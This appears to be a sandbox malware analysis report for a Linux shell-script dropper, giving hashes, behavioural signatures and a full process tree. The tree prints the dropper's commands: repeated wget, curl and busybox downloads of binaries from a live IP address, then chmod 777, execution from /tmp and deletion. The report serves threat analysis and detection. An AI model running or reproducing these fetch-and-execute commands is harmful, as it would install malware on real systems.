Analysis
- max time kernel: 13s
- max time network: 14s
- platform: debian-9_armhf
- resource: debian9-armhf-20240611-en
- resource tags: arch:armhf, image:debian9-armhf-20240611-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 28/10/2024, 01:06
Static task: static1
Behavioral task: behavioral1
- Sample: 6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
- Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2
- Sample: 6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
- Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3
- Sample: 6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
- Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4
- Sample: 6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
- Resource: debian9-mipsel-20240611-en
General
- Target: 6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
- Size: 10KB
- MD5: 1ac86a90ce63f5179c129c8cf2fda09b
- SHA1: 93b8c384331017eeb6de7c986cc660f98b161846
- SHA256: 6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f
- SHA512: 41efa6d2d833f311f30c0bc54b03684a2a367b8a2af5ef65c4558e978d25c26be60b9adf80b8f136de6f226c8d22f66cb74600dbd88cfeed4e1a7c92eda7cda0
- SSDEEP: 192:WryGNuGD2K9GmNVqMw1+9NeVlhl9NeVlhWHyGNuGp2K9Gmp:KyGNuGD2K9GmNVqMw1PyGNuGp2K9Gmp
Malware Config
Signatures
- File and Directory Permissions Modification (1 TTPs, 10 IoCs)
  Adversaries may modify file or directory permissions to evade defenses.
  pid / Process: 688 chmod; 747 chmod; 805 chmod; 811 chmod; 677 chmod; 695 chmod; 728 chmod; 757 chmod; 766 chmod; 796 chmod
- Executes dropped EXE (10 IoCs)
  ioc / pid / Process:
  /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP 679 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
  /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK 689 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK
  /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 697 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4
  /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F 729 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F
  /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp 749 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp
  /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 758 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2
  /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 768 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3
  /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir 797 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir
  /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C 806 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C
  /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 812 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7
- Checks CPU configuration (1 TTPs, 10 IoCs)
  Checks CPU information, which indicates whether the system is a virtual machine.
  description / ioc / Process: File opened for reading /proc/cpuinfo curl (10 occurrences)
- Reads runtime system information (signature name as tagged on the curl processes in the process tree below)
  description / ioc / Process: File opened for reading /proc/self/auxv curl (10 occurrences); File opened for reading /proc/sys/crypto/fips_enabled curl (10 occurrences)
- Writes file to tmp directory (10 IoCs)
  Malware often drops required files in the /tmp directory.
  description / ioc / Process:
  File opened for modification /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F curl
  File opened for modification /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp curl
  File opened for modification /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C curl
  File opened for modification /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK curl
  File opened for modification /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 curl
  File opened for modification /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 curl
  File opened for modification /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 curl
  File opened for modification /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir curl
  File opened for modification /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 curl
  File opened for modification /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP curl
Processes
Each entry is path (PID): command line; signatures triggered by that process follow in brackets. Child processes of the root script are indented.
- /tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh (PID 648): /tmp/6edd9797eb94859d206f8d735e3e2675226c578dcff20f9f68caacdf4e7f6e2f.sh
  - /bin/rm (PID 650): /bin/rm bins.sh
  - /usr/bin/wget (PID 652): wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
  - /usr/bin/curl (PID 665): curl -O http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 673): /bin/busybox wget http://87.120.126.196/bins/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
  - /bin/chmod (PID 677): chmod 777 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP [File and Directory Permissions Modification]
  - /tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP (PID 679): ./7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP [Executes dropped EXE]
  - /bin/rm (PID 680): rm 7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP
  - /usr/bin/wget (PID 682): wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK
  - /usr/bin/curl (PID 685): curl -O http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 687): /bin/busybox wget http://87.120.126.196/bins/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK
  - /bin/chmod (PID 688): chmod 777 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK [File and Directory Permissions Modification]
  - /tmp/2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK (PID 689): ./2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK [Executes dropped EXE]
  - /bin/rm (PID 690): rm 2VrFiAXJbtOeUGSbnfdO5hgbe0yHDlktCK
  - /usr/bin/wget (PID 691): wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4
  - /usr/bin/curl (PID 692): curl -O http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 693): /bin/busybox wget http://87.120.126.196/bins/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4
  - /bin/chmod (PID 695): chmod 777 EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 [File and Directory Permissions Modification]
  - /tmp/EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 (PID 697): ./EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4 [Executes dropped EXE]
  - /bin/rm (PID 698): rm EPe8bMhyOtbym7UATOY4qcG9aiqgjXaYu4
  - /usr/bin/wget (PID 699): wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F
  - /usr/bin/curl (PID 704): curl -O http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 709): /bin/busybox wget http://87.120.126.196/bins/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F
  - /bin/chmod (PID 728): chmod 777 PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F [File and Directory Permissions Modification]
  - /tmp/PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F (PID 729): ./PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F [Executes dropped EXE]
  - /bin/rm (PID 731): rm PLyorYxJtU8JUBy5a9SGaQQV8bjAil1W1F
  - /usr/bin/wget (PID 732): wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp
  - /usr/bin/curl (PID 737): curl -O http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 744): /bin/busybox wget http://87.120.126.196/bins/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp
  - /bin/chmod (PID 747): chmod 777 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp [File and Directory Permissions Modification]
  - /tmp/5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp (PID 749): ./5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp [Executes dropped EXE]
  - /bin/rm (PID 751): rm 5rpEurNB55ReN4BXl7EUYzzqS6L4ksS9wp
  - /usr/bin/wget (PID 752): wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2
  - /usr/bin/curl (PID 754): curl -O http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 756): /bin/busybox wget http://87.120.126.196/bins/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2
  - /bin/chmod (PID 757): chmod 777 zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 [File and Directory Permissions Modification]
  - /tmp/zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 (PID 758): ./zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2 [Executes dropped EXE]
  - /bin/rm (PID 759): rm zLjGOjUV1EzUZqJrfYwCoEP4JwwonSY7c2
  - /usr/bin/wget (PID 760): wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3
  - /usr/bin/curl (PID 761): curl -O http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 763): /bin/busybox wget http://87.120.126.196/bins/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3
  - /bin/chmod (PID 766): chmod 777 JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 [File and Directory Permissions Modification]
  - /tmp/JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 (PID 768): ./JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3 [Executes dropped EXE]
  - /bin/rm (PID 769): rm JyMyUWtaEdarpaegyjC3qK1KYJwYhF6Gb3
  - /usr/bin/wget (PID 771): wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir
  - /usr/bin/curl (PID 788): curl -O http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 793): /bin/busybox wget http://87.120.126.196/bins/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir
  - /bin/chmod (PID 796): chmod 777 EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir [File and Directory Permissions Modification]
  - /tmp/EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir (PID 797): ./EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir [Executes dropped EXE]
  - /bin/rm (PID 798): rm EbsDFM59ye6edMTLMrLcAh9Hlr8qWpl1Ir
  - /usr/bin/wget (PID 800): wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C
  - /usr/bin/curl (PID 803): curl -O http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 804): /bin/busybox wget http://87.120.126.196/bins/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C
  - /bin/chmod (PID 805): chmod 777 BrnxPv433MjDjfrrf92rrgfNzZalGRak1C [File and Directory Permissions Modification]
  - /tmp/BrnxPv433MjDjfrrf92rrgfNzZalGRak1C (PID 806): ./BrnxPv433MjDjfrrf92rrgfNzZalGRak1C [Executes dropped EXE]
  - /bin/rm (PID 807): rm BrnxPv433MjDjfrrf92rrgfNzZalGRak1C
  - /usr/bin/wget (PID 808): wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7
  - /usr/bin/curl (PID 809): curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 [Checks CPU configuration; Reads runtime system information; Writes file to tmp directory]
  - /bin/busybox (PID 810): /bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7
  - /bin/chmod (PID 811): chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 [File and Directory Permissions Modification]
  - /tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 (PID 812): ./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7 [Executes dropped EXE]
  - /bin/rm (PID 813): rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7
  - /usr/bin/wget (PID 814): wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8
-
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 153B
- MD5: 998368d7c95ea4293237f2320546e440
- SHA1: 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
- SHA256: 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
- SHA512: 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97